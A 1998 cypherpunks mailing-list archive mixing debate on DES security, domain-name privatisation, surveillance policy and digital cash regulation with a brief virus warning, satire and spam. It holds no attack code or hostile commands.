Date: Sat, 31 Jan 1998 07:29:11 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: US Tried Same Tricks With Cuba (fwd)
Message-ID: <199801302325.RAA19397@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Re: US Tried Same Tricks With Cuba
> Date: Fri, 30 Jan 1998 17:14:58 -0600 (CST)

> WHGIII writes:
> 
> > Grow-up! The world is a dangerious place with dangerious people in it.
> > Iraq is one of those places just like Cuba was back in the '60's.
> 
> Cuba is a pimple-sized island which in no way threatens the large
> continent next to it.

Perhaps not, but those Russian made and maintaned atomic ICBM's parked 90
miles off Florida certainly did...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roman Rutman (sw)" <roman@softwinter.com>
Date: Fri, 30 Jan 1998 23:45:53 +0800
To: "'cypherpunks@cyberpass.net>
Subject: virus alert!
Message-ID: <01BD2DA5.91BC4350.roman@softwinter.com>
MIME-Version: 1.0
Content-Type: text/plain



Previus message include virus:

C:\test2.com    : virus BW-based detected.

Do not run it.

Have a nice day,

Roman Rutman
roman@softwinter.com

seNTry 2020 - transparent disk encryption software - http://www.softwinter.com

The information in this e-mail maybe confidential and may also be legally 
privileged. It is intended solely for the addressee. Access to this e-mail 
by anyone else is unauthorized. If you are not the intended recipient, any 
disclosure, copying, distribution or any action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. When addressed 
to our clients any opinions or advise contained in this e-mail are subject 
to the terms and conditions expressed in the governing Soft Winter 
terms of business.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 31 Jan 1998 10:13:49 +0800
To: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Subject: Re: Predicting cipher life / NSA rigged DES? ...
In-Reply-To: <9801290026.AA13035@mentat.com>
Message-ID: <v03102800b0f8369ddc5d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




I had tended to not take too seriously the posts of someone who signs
himself as "Uhh...this is Joe," but the reasoning he displays below makes
me take him more seriously:

At 5:26 PM -0800 1/30/98, Uhh...this is Joe [Randall Farmer] wrote:

>Yes, I think that's what my (inaccurate) model would suggest you do, if my
>guesses as to break probability are close; real, practical cipher breaks get
>rarer after more analysis-hours pass -- i.e., ciphers are more likely to be
>broken in the first year of analysis than the tenth -- so expected lifetimes
>would increase with the amount of analysis survived.

Just so. With one minor caveat: the amount of time should be replaced by
"effort expended."

Clearly there are a lot of flaky algorithms which have been given scant
attention. It would be wrong to assume that the first year spent trying to
break Blowfish is comparable to the first year spent trying to attack
Virtual Matrix Superunbreakable Amazing Algorithm.

But I generally like your intuition.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 31 Jan 1998 10:36:37 +0800
To: cypherpunks@cyberpass.net
Subject: History of radio regulation; scrutiny of elected officials
Message-ID: <Pine.GSO.3.95.980130183132.6873D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 30 Jan 1998 18:31:25 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: History of radio regulation; scrutiny of elected officials

Attached below are excerpts from two Supreme Court cases. The first, NBC
v. U.S. (1943), I read this week for a communications law class I'm
auditing. 

The portion I'll include here deals with the history of radio (and I'm
aware that there are revisionist histories that appear to be more
accurate, or at least tell more of the truth). But I couldn't help
thinking of the domain name disputes while reading it. 

        Excerpt from National Broadcasting Co. v. U.S. (1943)

        ...The number of stations multiplied so rapidly, however, that
	by November, 1925, there were almost 600 stations in the
	country, and there were 175 applications for new
	stations. Every channel in the standard broadcast band
	was, by that time, already occupied by at least one
	station, and many by several. The new stations could be
	accommodated only by extending the standard broadcast
	band, at the expense of the other types of services, or
	by imposing still greater limitations upon time and
	power. The National Radio Conference which met in
	November, 1925, opposed both of these methods and called
	upon Congress to remedy the situation through
	legislation.

        The Secretary of Commerce was powerless to deal with the
	situation. It had been held that he could not deny a
	license to an otherwise legally qualified applicant on
	the ground that the proposed station would interfere with
	existing private or Government stations. And on April 16,
	1926, an Illinois district court held that the Secretary
	had no power to impose restrictions as to frequency,
	power, and hours of operation, and that a station's use
	of a frequency not assigned to it was not a violation
	of the Radio Act of 1912. This was followed on July 8,
	1926, by an opinion of Acting Attorney General Donovan
	that the Secretary of Commerce had no power, under the
	Radio Act of 1912, to regulate the power, frequency or
	hours of operation of stations. The next day the
	Secretary of Commerce issued a statement abandoning all
	his efforts to regulate radio and urging that the
	stations undertake self-regulation.

        But the plea of the Secretary went unheeded. From, July,
	1926, to February 23, 1927, when Congress enacted the
	Radio Act of 1927, 44 Stat. 1162, almost 200 new stations
	went on the air. These new stations used any frequencies
	they desired, regardless of the interference thereby
	caused to others. Existing stations changed to other
	frequencies and increased their power and hours of
	operation at will. The result was confusion and chaos.
	With everybody on the air, nobody could be heard. The
	situation became so intolerable that the President in his
	message of December 7, 1926, appealed to Congress to
	enact a comprehensive radio law...

Which gave us the predecessor of today's FCC. The question, of course, is
if the justification for the FCC was to eliminate chaos, why did the
agency not just stop there? Why the indecency rules, must-carry regs,
fairness doctrine, overseeing network-station relationships, and so on?

-Declan


---------- Forwarded message ----------
Date: Fri, 30 Jan 1998 14:41:10 -0500
From: Marc Rotenberg <rotenberg@epic.org>
To: Declan McCullagh <declan@well.com>
Subject: From the Brandeis File


 Decency, security, and liberty alike demand that
 government officials shall be subjected to the same
 rules of conduct that are commands to the citizens.
 In a government of laws, existence of the government
 will be imperilled if it fails observe the law
 scrupulously. Our government is the potent,
 omnipresent teacher. For good or ill, it teaches the
 whole people by example. Crime is contageous. If
 the government becomes a lawbreaker; it invites
 every man to become a law unto himself; it invites
 anarchy. To declare that in the administration of
 the criminal law the end justifies the means --
 to declare that the government may commit crimes
 to secure the conviction of a private criminal
 -- would bring terrible retribution. Against that
 pernicious doctrine this Court should resolutely
 set its face.

 Olmstead v. US (1928)

You remember Brandeis. He's the person who argued for
the *right* of privacy. Hardly a surprise, therefore,
that he would be so outspoken on the abuse of government
authority.

Marc.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 31 Jan 1998 10:45:59 +0800
To: cypherpunks@cyberpass.net
Subject: More on U.S. government and domain names
Message-ID: <Pine.GSO.3.95.980130184034.6873G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 30 Jan 1998 18:40:07 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: More on U.S. government and domain names

[In the way of self-promotion: Yesterday I taped a CSPAN program on online
journalism and Internet regulation. It's airing on CSPAN 1/30 at 7 pm,
CSPAN2 at 1/31 at 10 am, and CSPAN 2/2 at 5 pm. I'll also be on National
Empowerment Television (NET-TV) on Monday 2/2 around 10:15 pm to talk
about encryption regulation. Also tomorrow on PBS Technopolitics (airing
here at 11:30 am on WETA 26), the topic is crypto. I believe the guests
are NAM's David Peyton and Commerce Dept's William Reinsch. --Declan]

**********

Date: Fri, 30 Jan 1998 12:58:11 -0800
From: John Gilmore <gnu@toad.com>
To: declan@well.com, gnu@toad.com
Subject: Netrape Screwlootions begins operations under US Government plan

In response to the publication of the US Government's plan to
provide long-term stable operation of the Internet domain name system,
we have an announcement.

Today we are forming a new company, Netrape Screwlootions, Inc.  We
claim the domain names ".net", ".rape", ".screw", ".lootions", and
".inc", but will settle for ".screw" in the short term.  We have a
climate-controlled 24-hour operation center deep in the bowels of the
earth, with plenty of spare energy.  Though there are no ethical
standards required for assignment of a government-controlled domain
name, we assure you that we meet the highest ethical standards for the
lowest place.  We have extensive connections in all parts of the
Government, especially the White House, which will guarantee our
rightful place in the selection of appropriate organizations to
manage the transition from public service to throttled competition
and then to the heavenly free Internet envisioned by the plan.

We meet all the necessary requirements.  Everyone is welcome, and we
are open 24 hours a day and 365 days a year.  We have standardized on
high-quality Lucifer encryption for all our accesses.  We have
multiple high-speed connections to the upper world, and we daily make
an archive of all our customers so that they can be resuscitated for
continuing operations if they are accidentally destroyed.  Our
searchable database of customers is maintained by the Perl-y Gates
himself.  The first one is always free with us, including our
software.  Our number of global zones of service is completely
adequate, providing non-denominational worldwide access to our
facilities.

Our management policies have been reviewed by the very highest
authorities.  We assure you that our technical staff is very expert in
its machinations, and we offer them constant practice to refine their
skills.

We have created alternate dispute resolution for trademark-related
complaints.  This process does not involve the time, expense, and pain
of litigation.  Instead, our process involves sending trademark
lawyers and domain scammers to the deepest part of our operations
center, where their thresholds will be studied by the application of
delicate instruments that have taken centuries to perfect.  The party
who screams the loudest will prevail, as usual.  Innocent domain users
would be inconvenienced by the use of this procedure, but we do not
expect any innocent users to actually register domain names.  Both
sides in the trademark debate assure us that all domain names infringe
trademarks and that all trademark owners are slavering monsters.

Our level of security is the best.  No-one gets past the guards who
protect our portals, and we have been in operation for millennia.  No
malicious hacker has ever escaped us in the long term.  We definitely
provide a "hot switchover" capability.  We have extensive experience
with fires, earthquakes, tornadoes, arson, bombs, and other acts of
God and War.

It is often said that one's soul is visible in one's face, and what
else could be called the public face of a company but its name?  Your
name will be safe with us.  Our prices are quite low, certainly no
more than the price of a small mass of pottage.  We will be glad to
register your ...name with us, and when the appropriate time comes, you
will then know our true prices.  We are looking forward to it.

Moo-haa-haaaaaaaaaa.......

************

Date: Fri, 30 Jan 1998 12:00:01 -0500
From: Keith Dawson <dawson@world.std.com>
To: declan@well.com
Cc: politech@vorlon.mit.edu
Subject: Re: FC: U.S. gvt plan to fully privatize the Internet

At 10:15 AM -0500 1/30/98, Declan McCullagh wrote:
>The Clinton administration has released its long-awaited
>plan to privatize the central nervous system of the
>Internet.

Declan -- nice summary. See my  initial analysis at
http://www.tbtf.com/index.html#tbotoday .

****

Date: Fri, 30 Jan 1998 14:43:22 -0500
From: Mikki Barry <ooblick@netpolicy.com>
Subject: A-TCPIP/DNRC Press Release Re: Green Paper

Press Release
January 30, 1998

Contacts:
Mikki Barry
President, A-TCPIP/ Domain Name Rights Coalition
P.O. Box 25876
Alexandria, VA 22313-5876
703.925-0282
Email: ooblick@netpolicy.com

Harold Feld, Esq.
c/o Covington & Burling
1201 Pennsylvania Avenue, N.W.
P.O. Box 7566
Washington, D.C. 20044-7566
202.662-5132
Email: hfeld@domain-name.org or hfeld@cov.com


HERNDON, VA -  The Association for the Creation and Propagation of Internet
Policies (A-TCPIP) and its working group the Domain Name Rights Coalition
(DNRC)  welcome the release of the Commerce Department's Green Paper this
morning.  This paper marks the first time there has been a real effort to
capture the diversity of interests in the Internet community on the issue of 
Internet Governance.  "The Internet community should be grateful to Ira 
Magaziner and his staff for sorting through the hundreds of pages 
of comments and ideas and producing this well thought out paper," 
said Mikki Barry, president of A-TCPIP/DNRC.  "Now is the time for all 
small business and public interest organizations who wish to be heard 
to join with us in helping the Commerce Department focus on ensuring 
the Internet's continued role in communications and the free flow 
of information"

Harold Feld, Assistant General Counsel of the A-TCPIP/DNRC stated 
"This is a good first step, but more must come.  The Internet is a 
medium of communications and communities, not just commerce. The 
vast majority of Internet uses are for communications rather than 
commerce.  We need a clear statement that communications and free 
speech, including personal and political speech and parody, is valued 
and protected above all other interests including commerce and 
intellectual property.  The policies of this paper need to reiterate 
that fact."

While applauding the paper's recognition of the role of free 
market innovators, A-TCPIP/DNRC Vice President and Internet entrepreneur 
Mike Doughney worried that the paper also contained provisions that 
would shut out small businesses and people with new ideas.

" Dual T1 connections and 24 hour guards make registration 
services prohibitive for smaller business concerns to enter the 
marketplace," said Doughney "and allowing one company (even 
through separate subsidiaries) to be both registry and registrar 
further stifles the competitive nature inherent to the Internet."

Specific points of the paper that the A-TCPIP/DNRC feel need to 
be addressed include:

The make up of the non profit oversight corporation does not include enough 
seats for small business or for individual users.  One seat for each is not 
enough given that the vast majority of Internet use is by small business, 
individual users, non profit entities, and others who use it as a forum 
for communication.  

The role .us Top Level Domain needs to be clarified.  "The .us domain is a 
valuable resource that is woefully under utilized," said Kathryn
Kleiman, General Counsel of the organization.  "We are highly 
encouraged that Mr. Magaziner addressed it in his paper. We stand ready 
to assist in formulating a coherent policy for its use."

Registrars should not be forced to have a domain name dispute 
policy.  Domain name disputes, as with all other disputes involving trademark 
law need to be settled by court proceedings.  Trademark owners should have no 
superior rights in cyberspace than they have in any other medium of 
communications.

Registrars should not be forced to suspend domain names if an objection 
(baseless or not) is lodged within 30 days of that name's registration.  Doing 
so would prohibit timely personal, political and commercial speech, and is 
essentially a 30 day waiting period that would be particularly injurious to
small business interests.Further, the automatic suspension is contrary to 
trademark law because it effectively grants an automatic injunction against 
the domain name owner where the trademark owner has not proven any likelihood 
of confusion or infringment.

A-TCPIP/DNRC has represented entrepreneurs, small businesses and individuals
on issues of Internet governance and domain name concerns since 1995.  Its
Internet website can be found at http://www.domain-name.org and includes the
organization's comments to the Department of Commerce in this proceeding. 



































































































































































_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




---------- Forwarded message ----------
Date: Fri, 30 Jan 1998 21:21:48 EST
From: von Kriegsherr <kriegsherr@juno.com>
To: declan@well.com
Cc: politech@vorlon.mit.edu
Subject: U.S.Gov.To Turn `Net over to Moguls

Who are we kidding? Ourselves.

Keeping the `Net under the protection of U.S. soil, so to speak, is the
ONLY guarantee that some international Cabal does not decide for us
what we will be able to write or research.  It's a few short steps from a
total control of all information which is declared, "sensitive."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 31 Jan 1998 08:07:14 +0800
To: cypherpunks@toad.com
Subject: More on ISDN Features
Message-ID: <1.5.4.32.19980130235837.0072cee4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



This is from UK Crypto, where the ISDN-snoop part of the EuroParl 
report on technologies for political control was cited and asked if true. 
Perhaps Jim Choate, Steve Schear and others might clarify.

Date: Fri, 30 Jan 1998 00:09:40 +0000
To: ukcrypto@maillist.ox.ac.uk
From: John Brooks <jbrooks@peeras.demon.co.uk>
Subject: Re: [vin@shore.net: EuroParl Report - NSA, Crypto, Liberty & Trade]

   >A draft ("consultation version") of a report by the European
   >Parliament's Office for Scientific and Technological Option Assessment
   >(STOA) entitled "AN APPRAISAL OF TECHNOLOGIES OF POLITICAL 
   >CONTROL" has been submitted to the EuroParl's Civil Liberties and 
   >Interior Committee.

But this is all (or 99 percent) complete bollocks.

   >"[...] Some systems even lend themselves to a dual role as a national
   >interceptions network.

???

   > For example the message switching system used on digital 
   >exchanges like System X in the UK supports an Integrated
   >Services Digital Network (ISDN) Protocol. This allows digital
   >devices, e.g. fax to share the system with existing lines. The ISDN
   >subset is defined in their documents as "Signalling CCITT1-series
   >interface for ISDN access". 

I think this means I series - which are all public docs...

   >What is not widely known is that built in to the international CCITT 
   >protocol is the ability to take phones 'off hook' 
 
Yes - ok.  If you have a delinquent ISDN switch AND the totalitarian
state wants to bug you AND YOU choose to use a handset which 
DOES NOT break the analogue path between the microphone and 
the ISDN NTU / TA (all standard analogue phones break the circuit, 
AFAIK.  It's only the speakerphone gadgets that could be subverted.) 
Then I suppose this is possible.  But who gives a s**t about the .1% 
of vulnerable phones. And it would be dead easy to mod them to 
defeat any such attempt.  There are loads of easier ways to mount 
covert surveillance than screwing up the phone system!

   >and listen into conversations occurring near the phone,
   >without the user being aware that it is happening."

ISDN is NOT a 'message switching protocol', and there is none as such 
on Sys X and Y, which use SS7 for inter-switch signalling anyway.  The 
ISDN interfaces and service are only defined for the ends of various types 
of subscriber line, as far as I remember.  What happens inside the provider
network is up to the provider and is not ISDN.

I'm much more concerned about the Echelon system which was (finally)
reported in the Sunday Telegraph just before Xmas.  This system, it is
alleged, can intercept and look for keywords in ALL international comms
traffic.  I believe this also gets a mention in the Europarliament report.

Vote early and often for freely available strong encryption!!
(whatever JR mutters about 'doing him out of his livelihood' :=)  )

Key escrow is another example of complete bollocks, IMHO.

Cheers

-jb

-- 
John Brooks  -  Consultant in Data Communications, Networking and Energy Systems
South Croydon, 7,CR2 7HN, UK Tel: (44) 181 681 1595 Fax: (44) 181 649 7536
The opinions expressed here are mine but are not offered as professional advice.

----------

BTW, provocative commentary on the EuroParl report by Vin McLellan, 
which is the source of the UK Crypto thread, is available at:

   http://jya.com/nsa-etc-nf.htm 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Sat, 31 Jan 1998 09:31:02 +0800
To: Jim Gillogly <jim@mentat.com>
Subject: Re: Predicting cipher life / NSA rigged DES? / Destroying encrypted data (Tangent to Re: Burning papers)
In-Reply-To: <9801290026.AA13035@mentat.com>
Message-ID: <Pine.OSF.3.96.980128193416.19021F-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Your best chance at encrypting stuff that needs a long shelf life is with a 
> cipher that's had a lot of analysis and plenty of intrinsic key, like 3DES.

Yes, I think that's what my (inaccurate) model would suggest you do, if my
guesses as to break probability are close; real, practical cipher breaks get
rarer after more analysis-hours pass -- i.e., ciphers are more likely to be
broken in the first year of analysis than the tenth -- so expected lifetimes
would increase with the amount of analysis survived.

Of course, like TcM said, chaining ciphers only cuts speed by a little and
helps security a lot.

> 
> > Am I just going crazy, or is it kind of obvious that NSA knew the s-boxes they
> > provided for DES weren't secure?
> 
> The former.

That shouldn't surprise anyone who's seen my posts. :)

> The S-boxes they replaced were bogus, and the ones they came up with were
> good against differential cryptanalysis -- better than random ones. There's
> no a priori reason to believe they knew about linear cryptanalysis, and in
> any case Matsui's l.c. attack on DES is better than brute force only in
> situations where you have a great deal of known or chosen plaintext.  So how
> come you claim they aren't secure?  DES isn't suitable for long-archived
> info, but is still OK for short-lifetime data against a not-too-motivated
> attacker: its only known weakness for this application is its key-length, not
> its S-boxes.

Perhaps I should say that the S-boxes weren't as secure as they could/should
have been. We know how to construct better ones now (s^5 DES is just that --
DES w/better [?] S-boxes), and I'd venture to say that if NSA wasn't 21 years
ahead, they either spent most of their cash on computers, not crypto whizzes,
or else the cryptographers spent too much time on coffee breaks...

As to their knowledge of linear attacks back then, the same thing applies; 
although we have no solid evidence, assuming they were up to today's level of
analysis is not exactly going out on a limb. 

Now, this *is* going out on a limb (while contradicting my original statement
:), but there's always the possibility that those S-boxes *were* as good as
they could have been for 16 rounds, and there was an even more vile attack
against DES with S-boxes which we think are more secure.

...
>
> Jim Gillogly 
> Trewesday, 8 Solmath S.R. 1998, 00:27 
> 12.19.4.15.17, 8 Caban 15 Muan, Second Lord of Night

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Fri, 30 Jan 1998 22:48:42 +0800
To: cypherpunks@cyberpass.net (Cypherpunks)
Subject: EU considers letting police snoop on Internet [fwd infobeat]
Message-ID: <199801301956.TAA00281@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



*** EU considers letting police snoop on Internet

European Union justice ministers agreed Thursday to consider letting
police snoop on Internet users as a measure to tackle organized
crime. Police, who fear the Internet is being used by international
criminals for money laundering and other crimes, are currently barred
from tapping into the computer messages. The ministers, gathered for
an informal meeting in Birmingham, England, agreed police should be
given new powers but added they should be tightly restricted so as
not to damage the rapidly growing computer industry. See
http://www.infobeat.com/stories/cgi/story.cgi?id=11230876-266

-- 
#!/usr/bin/perl
eval unpack u,'J)",](DIU<W0@06YO=&AE<B!097)L($AA8VME<EQN(CMP<FEN="!T:6UE'; 

==========================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail <mail@reba.com>
Date: Sat, 31 Jan 1998 05:47:14 +0800
To: "Random Q. Hacker" <cypherpunks@Algebra.COM>
Subject: RebaNet Exclusive
Message-ID: <19980130152058.0b149a6d.in@mail.marthastewart.com>
MIME-Version: 1.0
Content-Type: text/plain



For a limited time you can get a Reba T-shirt for only $10.00 ($16.00 value).

For more information on this special offer, go to the following Internet address:

http://www.reba.com/RebaNetExclusive





Copyright 1998 Starstruck Entertainment, All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mail@weboneinc.comThe.Hottest.Young.Guy.Site.on.the.Net@josh1.weboneinc.com
Date: Sat, 31 Jan 1998 09:53:06 +0800
To: cypherpunks@toad.com
Subject: Increased PayoutsUtilizing your traffic
Message-ID: <199801310143.UAA27020@josh1.weboneinc.com>
MIME-Version: 1.0
Content-Type: text/plain



If you have traffic on your straight site that is looking for pics of the hottest guys on the net where do you send them?  
      We have a premiere site on the net that has been around for 9 months with a consistent payout every two weeks.  If you would like to take your under utilized traffic and make good money from it then please check out:
http://www.breathlessboys.com/webmasters/

What do we offer you?
      As the webmaster we understand that it is very important that you get paid and in a serious way.  This is why we offer you $7 for every free membership you sell.  Even better when you sell a one month membership we pay you $15, sell a six month and get $30, if you sell more than 10 free memberships these numbers go up even higher, to see a complete breakdown head on over to:
http://www.breathlessboys.com/webmasters/

Is this easy and quick?
      Yes, take just five minutes of your time to signup.  Your account is generated automatically and you can be up and running just as fast as you can get those banners up on your site.  Don't delay signup now:
http://www.breathlessboys.com/webmasters/

How do I know what I sold and when do I get paid?
      Stats in real-time availible online 24 hours a day seven days a week for you to check on how your account is doing.  You will be paid for your commissions on the 3rd and 18th of every month.

Any more questions?
      Feel free to contact our account executive at:
webmaster@breathlessboys.com

http://www.breathlessboys.com/webmasters/   

-------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 31 Jan 1998 10:09:53 +0800
To: cypherpunks@toad.com
Subject: Why This List Is A Security Risk
Message-ID: <1.5.4.32.19980131020517.00720848@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Setting policy on national security risk for the entire USG, 
the DoD proclaims a trustworthy person does not engage in 
the following:

Sec. 147.14  Guideline L--Outside activities.

    (a) The concern. Involvement in certain types of outside employment
or activities is of security concern if it poses a conflict with an
individual's security responsibilities and could create an increased risk of
unauthorized disclosure of classified information.
    (b) Conditions that could raise a security concern and may be
disqualifying include any service, whether compensated, volunteer, or
employment with: 
    (1) A foreign country;
    (2) Any foreign national;
    (3) A representative of any foreign interest;
    (4) Any foreign, domestic, or international organization or person
engaged in analysis, discussion, or publication of material on
intelligence, defense, foreign affairs, or protected technology.

-----

>From 32 CFR Part 147 published today.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Jan 1998 13:28:39 +0800
To: cypherpunks@Algebra.COM
Subject: orlin grabbe on digital cash
Message-ID: <199801310522.VAA17339@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



from zolatimes, an interesting online newspaper
also Orlin's site is an eyeful!

------- Forwarded Message

From: Kris Millegan  RoadsEnd <RoadsEnd@AOL.COM>
Subject:      Digital Cash and the Regulators
To: CTRL@LISTSERV.AOL.COM

from:
http://zolatimes.com/
Laissez Faire City Times Newspaper
- -----
Another fine issue, As always, . . .
Om
K
- -----
- ------------------------------------------------------------------------
January 29, 1998 - Volume 2, Issue 3
Editor & Chief: Emile Zola
- ------------------------------------------------------------------------
- - III-By J. Orlin Grabbe
The City Times

- ------------------------------------------------------------------------
Digital Science Department


Digital Cash and the Regulators

by J. Orlin Grabbe

""" Digital cash, like other forms of money, can be issued in any
political or legal jurisdiction, or in any banking environment: Salt
Lake City, the Cayman Islands, Cyprus, or Sidney. There is a great deal
of flexibility available to the digital cash provider when viewed from a
global perspective.

Nevertheless, digital cash may operate locally under a set of rules and
regulations similar to other forms of computer money such as bank
deposits. ("Locally" can be almost any Internet-accessible country.) The
question of how banking regulators view digital cash is a practical one,
because the answers to the question demonstrate the sort of issues that
arise in any banking context. All the examples here will involve the
U.S., a country with a complex maze of banking regulations.

>From the point of view of central bankers, digital cash generates three
sorts of questions. Who issues it? How is it used as a means of payment?
What impact does it have on the banking system balance sheet or
bottom-line?


Currency Competition and Seigniorage

Digital cash is by design a partial substitute for ordinary cash. Hence
it will be used in much the same fashion as ordinary cash--a context
with which central bankers are familiar. To a certain extent, digital
cash threatens the profitability inherent in central bank note issue.

Consider traveler's checks. Traveler's checks are a form of private bank
currency. They are analogous to the bank notes issued by private
commercial banks in the U.S. prior to the Civil War. As such, they are
very profitable to the banks and companies that issue them, because no
interest is paid out on traveler's checks to the check holders, but the
issuer earns interest on the funds that customers use to purchase them.
When you purchase American Express Traveler's Checks, you are making an
interest-free loan to American Express. That's why AMEX likes to sell
them to you--apart from the fees involved in the transaction.

As with traveler's checks, digital cash products such as electronic
purses (a card with a memory chip on it) represent an attempt by
commercial banks to capture part of the seigniorage earned by the
central bank from issuing notes. Holders of currency (Federal Reserve
notes) are making an interest-free loan to the government. The interest
opportunity cost adds up. The approximate $20 billion that the Federal
Reserve turned over to the U.S. Treasury in 1994, for example,
represented about 5 percent of the $400 billion in Federal Reserve
notes.

The Bank for International Settlements (BIS) estimated that in the
United States seigniorage is .43 percent of gross domestic product
(GDP), while central bank (Federal Reserve) expenses are .03 percent of
GDP, implying a profit of .40 percent of GDP. [1]

These numbers can be used as a reference base to calculate the amount of
seigniorage recapture available to providers of digital cash. Suppose
that that digital cash was so successful for small purchases that it
eliminated the U.S. $1, $5, $10, and $20 dollar bills. In that case, the
BIS estimates the loss in seigniorage at .14 percent of GDP. Now it is
highly unlikely that digital cash would replace all small denomination
bills, as assumed in this calculation. But the calculation shows that up
to one-third of current Federal Reserve seigniorage is potentially
available to digital cash providers. And that's a lot of money.

While some central banks may be concerned that digital cash will
infringe on their monopoly of issuing bank notes (although most do not
appear to be particularly alarmed), such a monopoly can be easily
circumvented without computers and without telecommunications. All that
is required for the success of any privately-issued currency is local
acceptance as a means of payment for goods and labor. Consider, for
example, HOURS, which is a local currency circulating in Ithaca, New
York. Here is a brief (albeit dated) summary of the HOURS system. [2]

HOURS is a local currency created and issued by citizens in Ithaca, New
York. The organizers have issued over $50,000 in local paper money to
over 950 participants since 1991. An estimated $500,000 of in
HOURS-based transactions have taken place.

The idea behind an HOUR is that it is a rough equivalent to a $10.00
bill. The unit was chosen because ten dollars per hour was the average
wage paid in Tompkins County. HOUR notes come in four denominations, and
have been used to buy goods and services like plumbing, carpentry,
electrical work, roofing, nursing, chiropractic care, child care, car
and bike repair, food, eyeglasses, firewood, and gifts. The local credit
union accepts them for mortgage and loan fees. People pay rent with
HOURS. Some of the best restaurants in town take them, as do movie
theaters, bowling alleys, two large locally-owned grocery stores, and
thirty farmer's market vendors.

Everyone who agrees to accept HOURS is paid two HOURS ($20.00) for being
listed in the newsletter Ithaca Money. Every eight months they may apply
to be paid an additional two HOURS, as reward for continuing
participation. This mechanism increases the per capita supply of HOURS.
Ithaca Money contains 1200 member listings. HOUR loans are made without
interest charges.

Multi-colored HOURS bear serial numbers and are printed on
hard-to-counterfeit locally-made watermarked cattail (marsh reed) paper.
Naturally, HOUR payments are taxable income when received for
professional goods or services.
The organizers have created a guide to creating local currency, called a
Hometown Money Starter Kit. The Kit explains the start-up and
maintenance of an HOURS system, and includes forms, laws, articles,
procedures, insights, samples of Ithaca's HOURS, and issues of Ithaca
Money. They've sent the Kit to over 300 communities in 45 states. To get
one, send $25.00 (or 2.5 HOURS) to Ithaca Money, Box 6578, Ithaca, NY.
14851.

HOURS, much like traveler's checks, are an attempt to recapture a part
of the currency seignoriage usually given up to the central bank. Like
HOURS, digital cash does not require the approval of some central
authority to form a viable mechanism. And the presence of seigniorage
means that digital cash products can be highly profitable, for they
simply arbitrage the difference between the cost of producing digital
cash and the return available to the issuers of the medium of exchange.
As we saw previously, the Federal Reserve made $20 billion of this
arbitrage in 1994, after payment of all expenses.

Is Digital Cash (Stored-Value) a Deposit?

U.S. banking regulations distinguish broadly between deposit-issuing
institutions and others. Thus the question whether the digital cash
liability of a private company represents a deposit or not determines
who might attempt to regulate it or whether it is eligible for federal
deposit insurance.

Some of these questions here are more important in a non-anonymous
digital cash system than in an anonymous one. A depositor who is
anonymous, or who wishes his transactions to remain private, is probably
not interested in being identified for insurance purposes, or receiving
